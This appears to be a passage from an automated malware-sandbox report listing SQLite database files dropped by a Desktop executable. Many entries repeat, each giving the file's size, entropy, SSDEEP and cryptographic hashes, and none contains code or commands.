                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
